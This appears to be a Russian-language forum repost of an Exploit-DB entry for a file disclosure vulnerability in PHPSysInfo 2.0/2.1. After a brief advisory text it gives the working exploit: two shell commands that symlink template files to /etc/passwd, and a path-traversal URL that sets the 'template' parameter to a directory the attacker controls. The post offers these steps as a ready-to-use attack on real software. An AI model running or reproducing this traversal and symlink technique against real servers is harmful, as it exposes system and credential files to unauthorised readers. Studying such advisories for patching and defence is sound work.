Exploit PHPSysInfo 2.0/2.1 - 'index.php' File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22457
Проверка EDB
  1. Пройдено
Автор
ALBERT PUIGSECH GALICIA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2003-04-03
Код:
source: https://www.securityfocus.com/bid/7275/info

PHPSysInfo has been reported to be vulnerable to a file disclosure issue.

Local users may be capable of influencing the include path for several PHPSysinfo template files. If the malicious template file is symlinked to a web server readable file, the contents of the linked file may be disclosed to the attacker.

This attack may lead to confidential or sensitive information disclosure, which could be used to launch other attacks. 

~$ ln -s /etc/passwd /tmp/form.tpl
~$ ln -s /etc/passwd /tmp/box.tpl

http://www.example.com/index.php?template=../../../../tmp
 
Источник
www.exploit-db.com

Похожие темы